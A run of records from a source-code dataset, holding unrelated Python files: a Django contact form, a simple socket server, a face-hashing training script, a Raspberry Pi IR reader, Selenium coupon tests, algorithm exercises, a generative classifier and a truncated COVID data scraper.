midi.disable(int(event.dict['n']))\n elif events.check(event, 'ENABLE_INSTRUMENT'):\n midi.enable(int(event.dict['n']))\n elif events.check(event, 'WIRE_TRACK'):\n tracks[event.dict['track']].setMidiChannel(event.dict['instrument'])\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":24635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"489798425","text":"from django import forms\nfrom django.template.defaultfilters import mark_safe\n\nclass ContactForm(forms.Form):\n subject = forms.CharField(\n max_length=100,\n label = mark_safe('Subject: ')\n )\n email = forms.EmailField(\n required=False,\n label = mark_safe('Email: ')\n )\n message = forms.CharField(\n widget=forms.Textarea,\n label = mark_safe('Message: ')\n )\n\n","sub_path":"BUCTML/contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524093429","text":"import socket\r\n\r\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserversocket.bind((socket.gethostname(), 1239))\r\n\r\nserversocket.listen(5)\r\nprint ('server started and listening')\r\nwhile 1:\r\n (clientsocket, address) = serversocket.accept()\r\n print (\"connection found!\")\r\n data = clientsocket.recv(2048).decode()\r\n print(data)\r\n r='Receieve'\r\n clientsocket.send(r.encode())\r\n\r\nclientsocket.close()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"10497776","text":"from utils import *\nfrom model import DFHNet\nimport torch.optim as optim\nfrom datetime import datetime\nimport sys\nimport argparse\nfrom Loss import DualClasswiseLoss\nfrom torch.utils.data import DataLoader\nimport time\nimport torch.backends.cudnn as cudnn\nfrom torchvision import datasets\nfrom InceptionRes_ft_pytorch.inception_resnet_v1 import InceptionResnetV1\n\n\n\nparser = argparse.ArgumentParser(description='PyTorch Implementation of Paper: Deep Center-based Dual-constrained Hashing(DCDH).')\nparser.add_argument('--lr1', default=0.005, type=float, 
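# ----------------------------------------------------------------------------
# A matching client for the server.py record above (it binds
# socket.gethostname() on port 1239 and answers every message with
# 'Receieve'). Note the server's clientsocket.close() sits after its
# infinite loop and so never runs; closing inside the loop would release
# each connection.
import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((socket.gethostname(), 1239))
    s.send("hello".encode())
    print(s.recv(2048).decode())    # -> 'Receieve'
# ----------------------------------------------------------------------------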
help='learning rate of backbone network')\nparser.add_argument('--lr2', default=0.005, type=float, help='learning rate of loss layer')\n\nparser.add_argument('--save', type=str, help='path to saving model')\nparser.add_argument('--dataset', type=str, default='facescrub', help='should be one of {facescrub, youtube, vgg}')\nparser.add_argument('--bs', type=int, default=256, help='Batch size of each iteration')\nparser.add_argument('--len', type=int, default=48, help='length of hashing codes, should be one of {12, 24, 36, 48}')\n\n# hyper params.\nparser.add_argument('--sigma', default=0.25, type=float, help='class gap of ClasswiseLoss')\nparser.add_argument('--inner_param', default=0.1, type=float, help='balance weight on two constraints')\nparser.add_argument('--lamda', default=1, type=float, help='regularization on regression')\nparser.add_argument('--eta', default=0.01, type=float, help='quantization weight')\n\nargs = parser.parse_args()\n\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\ncudnn.benchmark = True\n\n\nif args.dataset in ['facescrub', 'youtube']:\n\n EPOCHS = 700\n transform_tensor = transforms.Compose([\n transforms.ToTensor()])\n trainset = MyDataset(args.dataset, transform=transform_tensor, train=True)\n trainloader = DataLoader(trainset, batch_size=args.bs, shuffle=True)\n testset = MyDataset(args.dataset, transform=transform_tensor, train=False)\n testloader = DataLoader(testset, batch_size=args.bs, shuffle=False)\n net = torch.nn.DataParallel(DFHNet(args.len)).to(device)\n classes = len(np.unique(trainset.train_y))\n\nelse:\n EPOCHS = 100\n trainPaths = \"./vggface2/train\"\n testPaths = \"./vggface2/test\"\n cropped_size = 160\n Normalize = transforms.Normalize((0.5141, 0.4074, 0.3588), (1, 1, 1))\n\n transform_train = transforms.Compose([\n transforms.Resize(cropped_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n Normalize,\n ])\n\n transform_validation = transforms.Compose([\n transforms.Resize(cropped_size),\n transforms.ToTensor(),\n Normalize,\n ])\n\n trainset = datasets.ImageFolder(root=trainPaths, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.bs, shuffle=True, num_workers=6)\n testset = datasets.ImageFolder(root=testPaths, transform=transform_validation)\n testloader = torch.utils.data.DataLoader(testset, batch_size=args.bs, shuffle=False, num_workers=6)\n classes = len(trainset.classes)\n Inception = InceptionResnetV1(pretrained=\"vggface2\", fc=True, num_bits=args.len)\n net = torch.nn.DataParallel(Inception).to(device)\n\n\ndef adjust_learning_rate(optimizer, epoch):\n\n \"\"\"Sets the learning rate to the initial LR decayed by 0.5 every 100 epochs\"\"\"\n lr = []\n lr.append(args.lr1 * (0.5 ** (epoch // 100)))\n lr.append(args.lr2 * (0.5 ** (epoch // 100)))\n for i, param_group in enumerate(optimizer.param_groups):\n param_group['lr'] = lr[i]\n return lr\n\n\ndef train(EPOCHS):\n\n print('==> Preparing training data..')\n\n if args.dataset in ['facescrub', 'youtube']:\n\n print(\"number of training images: \", len(trainset.train_y))\n print(\"number of classes: \", classes)\n print(\"number of test images: \", len(testset.test_y))\n print(\"number of training iterations per epoch:\", len(trainloader))\n\n else:\n print(\"number of training images: \", len(trainset))\n print(\"number of classes: \", classes)\n print(\"number of test images: \", len(testset))\n print(\"number of training iterations per epoch:\", len(trainloader))\n\n criterion = 
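# ----------------------------------------------------------------------------
# adjust_learning_rate above halves both parameter-group LRs every 100
# epochs. torch.optim.lr_scheduler.StepLR(step_size=100, gamma=0.5) applies
# the same per-group schedule without the manual bookkeeping; a tiny sketch:
import torch

params = [torch.nn.Parameter(torch.zeros(1))]
opt = torch.optim.SGD([{"params": params, "lr": 0.005}], lr=0.005)
sched = torch.optim.lr_scheduler.StepLR(opt, step_size=100, gamma=0.5)
for _ in range(201):                 # epochs 0..200
    opt.step()
    sched.step()
print(opt.param_groups[0]["lr"])     # 0.005 * 0.5**2 = 0.00125
# ----------------------------------------------------------------------------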
DualClasswiseLoss(num_classes=classes, inner_param=args.inner_param, sigma=args.sigma, feat_dim=args.len, use_gpu=True)\n\n    best_epoch = 0\n    best_loss = 1e4\n    if args.dataset in ['facescrub', 'youtube']:\n        optimizer = optim.Adam([\n            {'params': net.module.parameters(), 'weight_decay': 1e-4, 'lr': args.lr1, 'amsgrad': True},\n            {'params': criterion.parameters(), 'weight_decay': 1e-4, 'lr': args.lr2}\n        ])\n    else:\n        optimizer = optim.SGD([\n            {'params': net.module.parameters(), 'weight_decay': 5e-4},\n            {'params': criterion.parameters(), 'weight_decay': 5e-4}\n        ], lr=args.lr1, momentum=0.9)  # args defines lr1/lr2, not lr; adjust_learning_rate resets each group per epoch\n\n    since = time.time()\n    for epoch in range(EPOCHS):\n        print('==> Epoch: %d' % (epoch + 1))\n        net.train()\n        dcdh_loss = AverageMeter()\n        adjust_learning_rate(optimizer, epoch)\n        # epoch_start = time.time()\n        for batch_id, (imgs, labels) in enumerate(trainloader):\n            imgs, labels = imgs.to(device), labels.to(device)\n            optimizer.zero_grad()\n            hash_bits = net(imgs)\n            loss_dual = criterion(hash_bits, labels)  # difference between image loader and custom loader\n            hash_binary = torch.sign(hash_bits)\n            batchY = EncodingOnehot(labels, classes).cuda()\n            W = torch.mm(torch.inverse(torch.mm(torch.transpose(batchY, 0, 1), batchY) + args.lamda * torch.eye(batchY.size(1)).cuda()),\n                         torch.mm(torch.transpose(batchY, 0, 1), hash_binary))  # Update W\n\n            batchB = torch.sign(torch.mm(batchY, W) + args.eta * hash_bits)  # Update B\n\n            loss_vertex = (hash_bits - batchB).pow(2).sum() / len(imgs)\n            loss_h = loss_dual + args.eta * loss_vertex\n\n            dcdh_loss.update(loss_h.item(), len(imgs))\n            loss_h.backward()\n            optimizer.step()\n\n        print(\"[epoch: %d]\\t[hashing loss: %.3f ]\" % (epoch+1, dcdh_loss.avg))\n\n        if (epoch+1) % 10 == 0:\n            net.eval()\n            with torch.no_grad():\n                centers_trained = torch.sign(criterion.centers.data).cuda()\n                trainB, train_labels = compute_result(trainloader, net, device, centers_trained)\n                testB, test_labels = compute_result(testloader, net, device, centers_trained)\n                mAP = compute_mAP(trainB, testB, train_labels, test_labels, device)\n                print('[Evaluate Phase] Epoch: %d\t mAP: %.2f%%' % (epoch+1, 100. 
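# ----------------------------------------------------------------------------
# The W update in the loop above applies the ridge-regression closed form
# (Y^T Y + lambda*I)^-1 Y^T B with torch.inverse. torch.linalg.solve computes
# the same product more stably; a small CPU sketch with made-up shapes:
import torch

torch.manual_seed(0)
Y = torch.nn.functional.one_hot(torch.randint(0, 5, (32,)), 5).float()  # (N, C)
B = torch.sign(torch.randn(32, 48))                                     # (N, bits)
lamda = 1.0
A = Y.T @ Y + lamda * torch.eye(Y.size(1))
W = torch.linalg.solve(A, Y.T @ B)      # equals torch.inverse(A) @ (Y.T @ B)
print(W.shape)                          # torch.Size([5, 48])
# ----------------------------------------------------------------------------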
* float(mAP)))\n\n if dcdh_loss.avg < best_loss:\n print('Saving..')\n if not os.path.isdir('checkpoint'):\n os.mkdir('checkpoint')\n torch.save({'backbone': net.module.state_dict(),\n 'centers': criterion.state_dict()}, './checkpoint/%s' % args.save)\n best_loss = dcdh_loss.avg\n best_epoch = epoch\n\n if (epoch - best_epoch) > EPOCHS // 4:\n print(\"Training terminated at epoch %d\" %(epoch + 1))\n break\n\n time_elapsed = time.time() - since\n print(\"Training Completed in {:.0f}min {:.0f}s with best loss in epoch {}\".format(time_elapsed // 60, time_elapsed % 60, best_epoch + 1))\n print(\"Model saved as %s\" % args.save)\n\n\n\nif __name__ == '__main__':\n\n if not os.path.isdir('log'):\n os.mkdir('log')\n save_dir = './log'\n\n assert args.save\n sys.stdout = Logger(os.path.join(save_dir,\n str(args.len) + 'bits' + '_' + args.dataset + '_' + datetime.now().strftime('%m%d%H%M') + '.txt'))\n print(\"[Configuration] Training on dataset: %s\\n Len_bits: %d\\n Batch_size: %d\\n learning rate: %.3f\\n #Epoch: %d\\n\"\n %(args.dataset, args.len, args.bs, args.lr1, EPOCHS))\n print(\"HyperParams:\\nsigma: %.3f\\t inner_param: %.4f\\t eta: %.4f\\t lamda: %.4f\" % (args.sigma, args.inner_param, args.eta, args.lamda))\n train(EPOCHS)\n","sub_path":"dcdh_train.py","file_name":"dcdh_train.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"306580231","text":"import RPi.GPIO as GPIO\r\nimport time\r\nfrom GCStatic import eb21\r\n\r\ndef get_signal(mode, i):\r\n res = ''\r\n if(mode == 'board'):\r\n GPIO.setmode(GPIO.BOARD)\r\n p = eb21.board[i]\r\n elif(mode == 'bcm'):\r\n GPIO.setmode(GPIO.BCM)\r\n p = eb21.bcm[i]\r\n print(i, p)\r\n GPIO.setup(p, GPIO.IN)\r\n res = GPIO.input(p)\r\n while(res == GPIO.input(p)):\r\n time.sleep(0.1)\r\n res = GPIO.input(p)\r\n return res\r\n\r\nif __name__ == '__main__':\r\n GPIO.cleanup()\r\n i = 7\r\n GPIO.setmode(GPIO.BOARD)\r\n print('board', i)\r\n while True:\r\n print(get_signal('board', i))\r\n# print('bcm')\r\n# blink('bcm')\r\n GPIO.cleanup()\r\n print('end')\r\n","sub_path":"vs1838b.py","file_name":"vs1838b.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"490104654","text":"import os\nimport time\nimport all_brackets2\nfrom parentheses import *\n\n\n# def remove_bad():\n# for br in brackets:\n# if br.count('()') <= 4:\n# newbrackets.append(br)\n\nst = list('123456789')\nbr = '()()()(())'\n\naaaa = []\n\n\n\ndef generate_combination_helper(br, st, i, last, ret):\n \"\"\"\n :param br: bracket string\n :param st: formula string\n :param i: index of bracket\n :param last: last index in string where bracket was added\n :param ret: list of combinations\n \"\"\"\n if last == len(st) + 1:\n return\n if i == len(br) - 1:\n for j in range(last + 1, len(st) + 1, 1):\n k = [*st]\n if j != len(k):\n k.insert(j, br[i])\n else:\n k.append(br[i])\n ret.append(''.join(k))\n else:\n for j in range(last +1, len(st) + 1, 1):\n k = [*st]\n k.insert(j, br[i])\n generate_combination_helper(br, k, i+1, j,ret)\n\n\ndef generate_combination(br, st):\n \"\"\"\n :param br: bracket string\n :param st: number string\n :return: combinations\n \"\"\"\n a = []\n out = []\n generate_combination_helper(br, st, 0, -1, a)\n for i in a:\n if '()' not in i and all(f\"({j})\" not in i for j in range(1,10,1)):\n out.append(i)\n return out\n\n\ndef generate_all():\n \"\"\"\n write all combinations of 
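# ----------------------------------------------------------------------------
# vs1838b.py above busy-polls GPIO.input in 0.1 s steps to catch the IR
# receiver's level changes. RPi.GPIO also provides a blocking edge wait,
# which avoids the polling loop (pin 7 mirrors the record's default):
import RPi.GPIO as GPIO

GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.IN)
GPIO.wait_for_edge(7, GPIO.BOTH)   # block until the level actually changes
print(GPIO.input(7))
GPIO.cleanup()
# ----------------------------------------------------------------------------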
'123456789' with 1-8 pairs of parentheses\n    \"\"\"\n    a = time.time()\n    f = open(\"all_brackets2.py\", 'w')\n    f.write('all_brackets = [',)\n    for i, br in enumerate(newbrackets):\n\n        for j in generate_combination(br, '123456789'):\n            f.write(f\"'{j}', \")\n        f.write('\\n')\n        os.system('cls')\n        if i >0:\n            print(f\"{(i / len(newbrackets)) * 100}% Complete\\n ETA: {(((len(newbrackets) / i) - 1) * (time.time() - a))/60} minutes\\navg time to compute formula: {(time.time() - a) / i}\\nELAPSED:{(time.time() - a)/60} minutes\")\n    f.write(']')\n    f.close()\n\ndef extract_no_redundant_brackets():\n    a = time.time()\n    f = open(\"all_brackets3.py\", 'w')\n    g = open(\"waste.txt\", 'w')\n    f.write('all_brackets = [',)\n    for i, br in enumerate(all_brackets2.all_brackets):\n\n        if not has_redundant_brackets(br):\n            f.write(f\"'{br}', \")\n        else:\n            g.write(f\"'{br}', \")\n        if i%1000== 0 and i >0:\n            f.write('\\n')\n            os.system('cls')\n            print(f\"{(i / len(all_brackets2.all_brackets)) * 100}% Complete\\n ETA: {(((len(all_brackets2.all_brackets) / i) - 1) * (time.time() - a))/60} minutes\\navg time to compute formula: {(time.time() - a) / i}\\nELAPSED:{(time.time() - a)/60} minutes\")\n    f.write(']')\n    f.close()\n    g.close()\n\ndef has_redundant_brackets(formula):\n    i = 0\n    while i < len(formula):\n        cnt = 0\n        if formula[i] == '(':\n            cnt += 1\n            j = i + 1\n            while j < len(formula):\n                if formula[j].isdigit():\n                    if cnt == 1:\n                        break\n                    else:\n                        j += 1\n                elif formula[j] == '(':\n                    j += 1\n                    cnt += 1\n                elif formula[j] == ')':\n                    j += 1\n                    cnt -= 1\n                    if cnt == 0:\n                        return True\n        i += 1\n    return False\n\n\nif __name__ == \"__main__\":\n    generate_all()\n    extract_no_redundant_brackets()","sub_path":"brackets.py","file_name":"brackets.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"425785403","text":"# coding=utf-8\r\n# Create storewide coupons (discount and cash voucher) in the Koubei admin backend\r\n\r\nfrom selenium import webdriver\r\nimport unittest, time, kbshop_login, kbshop_info, random\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\nexchange_test_address, environment = kbshop_info.exchange_url()\r\n\r\n\r\nclass CreateCrmh5PromoQC(unittest.TestCase):\r\n    def setUp(self):\r\n        # launch the browser in mobile emulation mode\r\n        mobileEmulation = {'deviceName': 'Nexus 4'}\r\n        options = webdriver.ChromeOptions()\r\n        options.add_experimental_option(\"excludeSwitches\", [\"ignore-certificate-errors\"])\r\n        options.add_experimental_option('mobileEmulation', mobileEmulation)\r\n\r\n        self.driver = webdriver.Chrome(\r\n            executable_path=r'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chromedriver.exe',\r\n            chrome_options=options)\r\n\r\n        server_address = kbshop_info.base_url_info()\r\n        self.base_url = server_address\r\n        # self.driver.implicitly_wait(10)\r\n        self.verificationErrors = []\r\n        # self.driver.maximize_window()\r\n        self.accept_next_alert = True\r\n\r\n    def test_create_qczk(self):\r\n        \"\"\"Test case: create a storewide discount coupon\"\"\"\r\n        driver = self.driver\r\n        # merchant login\r\n        kbshop_login.login(self)  # call the shared login helper\r\n\r\n        driver.find_element_by_xpath(\"html/body/div[1]/a[2]\").click()  # click Marketing Management\r\n        driver.find_element_by_xpath(\"//*[@id='carsshow_qczk']/div[4]/a\").click()  # storewide-discount issue-coupon button\r\n        # now on the coupon-issuing page\r\n\r\n        # append a random number so the coupon name stays unique, making it easy to check whether the coupon exists\r\n        i = random.randint(100, 200)\r\n        subject = str(i) + \"Acrmh5全场折扣券\"\r\n        brandname = str(i) + \"Acrmh5\"\r\n        print(subject)\r\n        # WebDriverWait(driver, 10).until(\r\n        #     lambda a: a.driver.find_element_by_id(\"ticketName\")).clear()  # coupon name\r\n        driver.find_element_by_name(\"subject\").clear()  # coupon name\r\n        
driver.find_element_by_name(\"subject\").send_keys(subject)\r\n driver.find_element_by_id(\"brandName\").send_keys(brandname) # 品牌名称\r\n\r\n # 高级选项\r\n driver.find_element_by_xpath(\"//*[@id='senior']\").click() # 下拉到底部,否则定位不到相应元素\r\n time.sleep(2)\r\n js = \"window.scrollTo(100,900)\"\r\n driver.execute_script(js)\r\n time.sleep(2)\r\n\r\n driver.find_element_by_xpath(\"//*[@id='quanPublish']\").click() # 确认发布\r\n\r\n # driver.get(\"http://test.blibao.com/h5kbhyyx/appCrm/page/activityManage.jsp\")\r\n # 检查是否存在“券名称”\r\n tip = WebDriverWait(driver, 20).until(\r\n lambda y: y.find_element_by_xpath(\"//*[@id='activityManage']/div[1]/div[1]/div[2]/div[1]/div[1]\"))\r\n\r\n if tip.text == subject:\r\n print(\"查询到全场折扣券=\" + tip.text)\r\n else:\r\n self.assertEqual(subject, tip.text)\r\n\r\n def test_create_qcdj(self):\r\n \"\"\"创建全场代金券用例\"\"\"\r\n driver = self.driver\r\n # 商家登录\r\n kbshop_login.login(self) # 调用登录\r\n\r\n driver.find_element_by_xpath(\"html/body/div[1]/a[2]\").click() # 点击营销管理\r\n driver.find_element_by_xpath(\"//*[@id='carsshow_qcdj']/div[4]/a\").click() # 全场折扣发券按钮\r\n # 进入发券界面\r\n\r\n # 名称添加随机数,目的是让券名保持唯一性,便于查看券是否存在\r\n i = random.randint(1, 100)\r\n subject = str(i) + \"Acrmh5全场代金券\"\r\n brandname = str(i) + \"Acrmh5\"\r\n print(subject)\r\n # WebDriverWait(driver, 10).until(\r\n # lambda a: a.driver.find_element_by_id(\"ticketName\")).clear() # 券名称\r\n driver.find_element_by_name(\"subject\").clear() # 券名称\r\n driver.find_element_by_name(\"subject\").send_keys(subject)\r\n driver.find_element_by_id(\"brandName\").send_keys(brandname) # 品牌名称\r\n\r\n # 高级选项\r\n driver.find_element_by_xpath(\"//*[@id='senior']\").click() # 下拉到底部,否则定位不到相应元素\r\n time.sleep(2)\r\n js = \"window.scrollTo(100,900)\"\r\n driver.execute_script(js)\r\n time.sleep(2)\r\n\r\n driver.find_element_by_xpath(\"//*[@id='quanPublish']\").click() # 确认发布\r\n\r\n # driver.get(\"http://test.blibao.com/h5kbhyyx/appCrm/page/activityManage.jsp\")\r\n # 检查是否存在“券名称”\r\n tip = WebDriverWait(driver, 20).until(\r\n lambda y: y.find_element_by_xpath(\"//*[@id='activityManage']/div[1]/div[1]/div[2]/div[1]/div[1]\"))\r\n\r\n if tip.text == subject:\r\n print(\"查询到全场代金券=\" + tip.text)\r\n else:\r\n self.assertEqual(subject, tip.text)\r\n\r\n def tearDown(self):\r\n self.driver.close()\r\n self.driver.quit()\r\n self.assertEqual([], self.verificationErrors)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n suite = unittest.TestSuite()\r\n suite.addTest(CreateCrmh5PromoQC(\"test_create_qczk\"))\r\n suite.addTest(CreateCrmh5PromoQC(\"test_create_qcdj\"))\r\n results = unittest.TextTestRunner().run(suite)\r\n","sub_path":"blibao-project/kbht_test_case/crmh5_case/crmh5_itempromo_tocreate_qc.py","file_name":"crmh5_itempromo_tocreate_qc.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"457262545","text":"#Uses python3\n\nimport sys\n\ndef IsGreaterorEqual(a,b):\n if b == -float('inf'):\n return True\n listofa = [int(x) for x in str(a) ]\n listofb = [int(x) for x in str(b) ]\n answer = True\n looping = True\n for i in listofa:\n for j in listofb:\n if i >j:\n answer = True\n looping = False\n break\n elif i< j:\n answer = False\n looping = False\n break\n if not looping:\n break\n\n return answer\n\n# print(IsGreaterorEqual(3,41))\n# print(IsGreaterorEqual(4445,4445))\n# print(IsGreaterorEqual(45,43))\n\ndef largest_number(alist):\n answer = []\n while alist != []:\n maxDigit = -float('inf')\n for digit in alist:\n if 
IsGreaterorEqual(digit,maxDigit):\n maxDigit = digit\n answer.append(maxDigit)\n alist.remove(maxDigit)\n # answer = [str(x) for x in answer]\n # res = \"\"\n # for x in answer:\n # res += x\n return answer #res\n \n# copy ma\ndef IsGreaterOrEqual_2(digit, max_digit):\n return int(str(digit)+str(max_digit))>=int(str(max_digit)+str(digit))\n\ndef largest_number_copy(lst):\n answer = []\n \n while lst!=[]:\n max_digit = 0\n for digit in lst:\n if IsGreaterOrEqual_2(digit, max_digit):\n max_digit = digit\n answer.append(max_digit)\n lst.remove(max_digit)\n\n return answer\n\nprint(largest_number_copy([1,2]))\nprint(largest_number([1,2]))\n\nfrom random import randint\ndef stress_test():\n n = randint(0,299)\n test_list = [] \n for i in range(n):\n test_list.append(randint(1,3000))\n i=1\n while True:\n if largest_number_copy(test_list) == largest_number(test_list):\n print('ok',i)\n i +=1\n else:\n print('Not ok', test_list,largest_number_copy(test_list) , largest_number(test_list))\n return \n\nprint(stress_test())\n\n# if __name__ == '__main__':\n# input = sys.stdin.read()\n# data = input.split()\n# a = data[1:]\n# print(largest_number(a))\n \n","sub_path":"01AlgorithmicDesignandTechniques/week3_greedy_algorithms_starters/6_maximum_salary/largest_number.py","file_name":"largest_number.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"174711596","text":"import csv, os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef getShuffleData(arrayX, arrayY):\n arrayRandomIndex = np.arange(len(arrayX))\n np.random.shuffle(arrayRandomIndex)\n return arrayX[arrayRandomIndex], arrayY[arrayRandomIndex]\n\n\ndef getTrainAndValidData(arrayTrainAllX, arrayTrainAllY, percentage):\n intInputDataSize = len(arrayTrainAllX)\n intValidDataSize = int(np.floor(intInputDataSize * percentage))\n\n arrayTrainAllX, arrayTrainAllY = getShuffleData(arrayTrainAllX, arrayTrainAllY)\n\n arrayValidX = arrayTrainAllX[0:intValidDataSize]\n arrayTrainX = arrayTrainAllX[intValidDataSize:]\n\n arrayValidY = arrayTrainAllY[0:intValidDataSize]\n arrayTrainY = arrayTrainAllY[intValidDataSize:]\n return arrayTrainX, arrayTrainY, arrayValidX, arrayValidY\n\n\ndef getSigmoidValue(z):\n s = 1 / (1.0 + np.exp(-z))\n return np.clip(s, 1e-8, 1 - (1e-8))\n\n\nif __name__ == \"__main__\":\n\n np.random.seed(11)\n \n # read Training data, Training label, Testing data\n dfTrainX = pd.read_csv(os.path.join(os.path.dirname(__file__), \"01-Data/X_train_my.csv\"))\n dfTrainY = pd.read_csv(os.path.join(os.path.dirname(__file__), \"01-Data/Y_train_my.csv\"))\n dfTestX = pd.read_csv(os.path.join(os.path.dirname(__file__), \"01-Data/X_test_my.csv\"))\n\n # transform the data to array\n arrayTrainX = np.array(dfTrainX.values) # (32561, 106)\n arrayTestX = np.array(dfTestX.values) # (16281, 106)\n arrayTrainY = np.array(dfTrainY.values) # (32561)\n\n # take some training data to be validation data\n arrayTrainX, arrayTrainY, arrayValidX, arrayValidY = getTrainAndValidData(arrayTrainAllX=arrayTrainX, arrayTrainAllY=arrayTrainY, percentage=0.3)\n\n # calculate maximum likelihood esitimator of mu and sigma\n intTrainSize = arrayTrainX.shape[0]\n intCount1 = 0\n intCount2 = 0\n\n arrayMu1 = np.zeros(arrayTrainX.shape[1]) # (106, )\n arrayMu2 = np.zeros(arrayTrainX.shape[1]) # (106, )\n for idx in range(intTrainSize):\n if arrayTrainY[idx] == 1:\n arrayMu1 += arrayTrainX[idx]\n intCount1 += 1\n else: \n arrayMu2 += 
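# ----------------------------------------------------------------------------
# largest_number above selection-sorts with pairwise concatenation checks in
# O(n^2). The same order ("a before b iff str(a)+str(b) >= str(b)+str(a)")
# can drive Python's O(n log n) sort via functools.cmp_to_key:
from functools import cmp_to_key

def largest_number(nums):
    def cmp(a, b):
        ab, ba = str(a) + str(b), str(b) + str(a)
        return (ab < ba) - (ab > ba)    # negative -> a sorts first
    return "".join(str(x) for x in sorted(nums, key=cmp_to_key(cmp)))

print(largest_number([21, 2]))          # '221'
print(largest_number([9, 4, 61, 45]))   # '961454'
# ----------------------------------------------------------------------------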
arrayTrainX[idx]\n intCount2 += 1\n\n arrayMu1 /= intCount1 \n arrayMu2 /= intCount2 \n\n arraySigma1 = np.zeros((arrayTrainX.shape[1], arrayTrainX.shape[1])) # (106, 106)\n arraySigma2 = np.zeros((arrayTrainX.shape[1], arrayTrainX.shape[1])) # (106, 106)\n for idx in range(intTrainSize):\n if arrayTrainY[idx] == 1:\n arraySigma1 += np.dot(np.transpose([arrayTrainX[idx]-arrayMu1]), [arrayTrainX[idx]-arrayMu1])\n # arraySigma1 += np.dot(np.transpose((arrayTrainX[idx]-arrayMu1)), (arrayTrainX[idx]-arrayMu1)) #can not inv\n else: \n arraySigma2 += np.dot(np.transpose([arrayTrainX[idx]-arrayMu2]), [arrayTrainX[idx]-arrayMu2])\n # arraySigma2 += np.dot(np.transpose((arrayTrainX[idx]-arrayMu2)), (arrayTrainX[idx]-arrayMu2)) #can not inv\n \n arrayCovariance = (float(intCount1)/intTrainSize) * arraySigma1 + (float(intCount2)/intTrainSize) * arraySigma2\n\n arrayCovarianceInverse = np.linalg.inv(arrayCovariance)\n\n\n # validation\n arrayW = np.dot(np.transpose((arrayMu1 - arrayMu2)), arrayCovarianceInverse)\n arrayB = -(0.5) * np.dot(np.dot(np.transpose(arrayMu1), arrayCovarianceInverse), arrayMu1) + (0.5) * np.dot(np.dot(np.transpose(arrayMu2), arrayCovarianceInverse), arrayMu2) + np.log(float(intCount1/intCount2))\n\n z = np.dot(arrayW, np.transpose(arrayValidX)) + arrayB\n s = getSigmoidValue(z)\n result = ((np.around(s)) == np.squeeze(arrayValidY))\n print(\"Vaild Accuracy:{} \".format(float(result.sum())/ len(arrayValidY)))\n\n\n # test\n ans = pd.read_csv(os.path.join(os.path.dirname(__file__), \"correct_answer.csv\"))\n z = np.dot(arrayW, np.transpose(arrayTestX)) + arrayB\n predict = np.around(getSigmoidValue(z))\n result = (predict == np.squeeze(ans[\"label\"]))\n print(\"Test Accuracy:{} \".format(float(result.sum())/ len(arrayTestX)))\n\n\n","sub_path":"李宏毅机器学习-作业/HW2/mainPG.py","file_name":"mainPG.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"253950460","text":"import os\nimport re\nimport csv\nimport boto3\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom stats.utils import get_matching_s3_cached_html, find_filename_date_matchs, get_s3_file_contents\n\nclass Command(BaseCommand):\n help = 'Get daily figures for daily death residence type'\n\n S3_HTML_BUCKET = 'static.startribune.com'\n S3_HTML_PATH = 'news/projects/all/2021-covid-scraper/raw'\n\n def handle(self, *args, **options):\n session = boto3.Session(\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,\n )\n s3 = session.client('s3')\n\n matching_files = get_matching_s3_cached_html(self.S3_HTML_BUCKET, self.S3_HTML_PATH, s3)\n noon_files = find_filename_date_matchs(matching_files, None)\n\n records = []\n\n for f in noon_files:\n print(f)\n soup = BeautifulSoup(get_s3_file_contents(f, self.S3_HTML_BUCKET, s3), 'html.parser')\n\n # total_new_deaths = None\n # total_new_deaths_section = soup.find('span', text='Newly reported deaths')\n # if total_new_deaths_section:\n # total_new_deaths = int(total_new_deaths_section.find_parent('td').find('strong').text)\n # print(total_new_deaths)\n\n homes_table = soup.find('table', id='restable')\n if not homes_table:\n print('Table not found.')\n # homes_th = soup.find('th', text=re.compile(\"Residence type.*\"))\n # if homes_th:\n # homes_table = homes_th.find_parent('tr').find_parent('table')\n else:\n\n for row in 
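# ----------------------------------------------------------------------------
# mainPG above accumulates the class means and pooled covariance in explicit
# Python loops. The same maximum-likelihood quantities vectorize in a few
# NumPy lines; random stand-in data replaces the income dataset here:
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 5))
y = rng.integers(0, 2, size=200)

mu1, mu2 = X[y == 1].mean(axis=0), X[y == 0].mean(axis=0)
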